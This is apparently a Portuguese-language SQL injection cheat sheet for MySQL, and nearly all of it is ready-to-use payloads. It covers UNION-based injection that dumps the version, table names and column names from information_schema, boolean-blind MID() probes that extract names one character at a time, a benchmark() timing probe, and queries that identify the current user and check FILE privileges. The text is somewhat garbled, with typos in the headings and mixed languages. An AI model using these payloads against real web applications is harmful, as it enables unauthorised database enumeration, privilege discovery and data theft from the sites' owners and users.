Tablelas MySQL
Obtendpotabela de nomes e nomes de coluna a partir do MySQL
Código:
0' UNION SELECT version(),null /* 0' UNION SELECT @@version,null /* 1' AND MID(version(),1,1) like '4 1' UNION SELECT (if(mid(version(),1,1) like 4, benchmark(100000,sha1(’test’)), ‘false’)),null /* Ler a tabela information_schema (versão> = 5,0)
Código:
0' UNION SELECT table_name,null FROM information_schema.tables WHERE version = '9
Código:
0' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name = 'tablename
Obter tudo num só
Código:
0' UNION SELECT column_name,table_name FROM information_schema.columns /* Read information_schema table blindly (version >= 5.0)
Código:
1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) > 'm 1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),2,1) > 'm
Código:
1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 2,1),1,1) > 'm 1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 2,1),2,1) > 'm
Código:
1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 1),1,1) > 'm 1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 1),2,1) > 'm
Código:
1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 2,1),1,1) > 'm 1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 2,1),2,1) > 'm
Obter current user
Código:
0' UNION SELECT current_user,null /* 0' UNION SELECT user(),null /* 1' AND user() LIKE 'root 1' AND MID((user()),1,1)>’m
Para MySQL 4:
Código:
0' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username 1' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y
Código:
0' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username% 1' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y
Comment